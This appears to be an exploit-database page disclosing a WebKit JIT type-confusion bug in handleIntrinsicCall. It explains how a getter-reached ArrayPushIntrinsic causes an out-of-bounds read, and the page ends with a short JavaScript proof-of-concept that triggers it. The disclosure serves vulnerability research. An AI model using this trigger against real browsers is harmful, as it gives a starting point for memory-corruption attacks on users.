62445895aa
8 changes to exploits/shellcodes WebKit JSC JIT - 'JSPropertyNameEnumerator' Type Confusion WebKit JIT - 'ByteCodeParser::handleIntrinsicCall' Type Confusion WebKit JSC - BytecodeGenerator::hoistSloppyModeFunctionIfNecessary Does not Invalidate the 'ForInContext' Object Unitrends Enterprise Backup - bpserverd Privilege Escalation (Metasploit) Linux - Nested User Namespace idmap Limit Local Privilege Escalation (Metasploit) Mac OS X - libxpc MITM Privilege Escalation (Metasploit) PHP imap_open - Remote Code Execution (Metasploit) TeamCity Agent - XML-RPC Command Execution (Metasploit)
29 lines
No EOL
939 B
JavaScript
29 lines
No EOL
939 B
JavaScript
/*
|
|
case ArrayPushIntrinsic: {
|
|
...
|
|
|
|
if (static_cast<unsigned>(argumentCountIncludingThis) >= MIN_SPARSE_ARRAY_INDEX)
|
|
return false;
|
|
|
|
ArrayMode arrayMode = getArrayMode(m_currentInstruction[OPCODE_LENGTH(op_call) - 2].u.arrayProfile, Array::Write);
|
|
|
|
...
|
|
}
|
|
|
|
This code always assumes that the current instruction is an op_call instruction. But that code can be reached from op_get_by_id or op_get_by_val instructions using getters. As an op_get_by_val instruction is smaller than an op_call instruction in size, this also can lead to an OOB read.
|
|
|
|
Note that the handlers for ArraySliceIntrinsic, ArrayIndexOfIntrinsic and ArrayPopIntrinsic have the same pattern.
|
|
|
|
PoC:
|
|
*/
|
|
|
|
Array.prototype.__defineGetter__('a', Array.prototype.push);
|
|
|
|
function opt() {
|
|
let arr = new Array(1, 2, 3, 4);
|
|
arr['a' + ''];
|
|
}
|
|
|
|
for (let i = 0; i < 1000; i++) {
|
|
opt();
|
|
} |